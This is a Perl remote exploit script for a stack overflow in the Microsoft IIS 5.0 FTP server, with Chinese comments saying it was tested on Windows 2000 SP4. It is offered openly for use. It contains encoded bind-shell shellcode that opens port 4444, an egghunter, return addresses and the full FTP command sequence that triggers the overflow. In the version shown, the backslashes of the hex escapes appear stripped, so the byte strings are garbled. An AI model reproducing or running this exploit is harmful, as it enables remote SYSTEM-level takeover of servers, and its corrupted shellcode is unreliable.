Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" .
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" .
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" .
"x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f" .
"x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46" .
"x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34" .
"x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a" .
"x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"
$shell="T00WT00W" ."xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4" .
"x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86" .
"xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01" .
"x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c" .
"x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb" .
"x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85" .
"xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e" .
"xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a" .
"x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5" .
"x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee" .
"x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3" .
"x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85" .
"x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8" .
"xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a" .
"x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80" .
"xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84" .
"x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d" .
"x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60" .
"x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca" .
"xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3" .
"x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19" .
"xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed" .
"xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f" .
"x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4" .
"x95x1fx6dxa1x99x8cx8exe0x90";
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>
";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
# 自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功
$patch = "x7exd1xf9x7f";
$retaddr = "x9BxB1xF4x77";
# 你可以使用wordexp的这两个跳转地址
#$patch = "x90x80xb7x6f";
#$retaddr = "xcdx60xb6x6f";
# 这里也修改了, 多加了两个"K", 因为$myfindsc中
# 用了"repne scasd[edi]"指令来查找Shellcode, 多
# 加两个"K"使其四字节对齐, 否则会找不到(通用性?)
$v = "KKKSEXY" . $sc . "V" x (500-length($sc)-5);
# 溢出时堆栈的基本状况
# |0 |104 | 108 |112 |164 |168 |172 |176
#$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";
#
#void myfindsc()
#{
# __asm
# {
# int 3;
#start:
# MOV EDX,ESP;
# FCMOVNBE ST,ST(2);
# _emit 0xd9;
# _emit 0x72;
# _emit 0xf4; FSTENV [edx-0Ch]
# POP EBP;
# PUSH EBP;
# POP EBX;
# PUSH 76h;
# POP EAX;
#xorsc:
# XOR BYTE PTR DS:[EBX+28h],AL; patch "decode" 的0xff
#findsc:
# MOV EAX,66666666h;
# SUB EAX,66566666h;
# PUSH EAX;
# POP EDI;
# PUSH 21212121h;
# POP ECX;
# MOV EAX,59584553h;
# REPNE SCAS DWORD PTR ES:[EDI];
#decode:
# _emit 0x89;
# _emit 0xE7; JMP EDI
# }
#}
#
#
#void main()
#{
# myfindsc();
#}
#
# 修改用于定位Shellcode的代码, 由于该代码需要调
# 用call或者jmp等指令以跳转到Shellcode的地方, 此
# 类指令包含了0xff, 会被IIS过滤, 所以这里采用了自
# 修改的形式将0xff patch掉. 本来想要alpha2加密,
# 但是加密后内容太长.
$myfindsc =
"x8bxd4xdbxd2xd9x72xf4x5dx55x5bx6ax76x58".
"x30x43x27xb8x66x66x66x66x2dx66x66x5Fx66".
"x50x5fx68x21x21x21x21x59xb8x53x45x58x59".
"xf2xafx89xe7";
$c = $myfindsc . "A" x (104 - length($myfindsc)) .
$patch . $patch. "xEBx8Ex44x44"."A" x 48 .
# |<-- 第二次跳转: 到这里后最终跳到$myfindsc
$patch . "AAAA". $retaddr . $patch . "A" x 16 ."xE2xAA"."NN";
# |<-- 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次
$x = <$sock>;
print $x;
print $sock "USER anonimoos
";
$x = <$sock>;
print $x;
print $sock "PASS $shell
";
$x = <$sock>;
print $x;
print $sock "USER anonimoos
";
$x = <$sock>;
print $x;
print $sock "PASS $shell
";
$x = <$sock>;
print $x;
print $sock "USER anonymous
";
$x = <$sock>;
print $x;
print $sock "PASS anonymous
";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port
";
$x = <$sock>;
print $x;
print $sock "SITE $v
"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v
";
$x = <$sock>;
print $x;
print $sock "SITE $v
";
$x = <$sock>;
print $x;
print $sock "SITE $v
";
$x = <$sock>;
print $x;
print $sock "SITE $v
";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port
";
$x = <$sock>;
print $x;
print $sock "MKD CCCC". "$c
"; # 这里也被修改了, 多加了个C, 用于4字节对齐
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "
";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/
";
$x = <$sock>;
print $x;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!
" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
via baicker
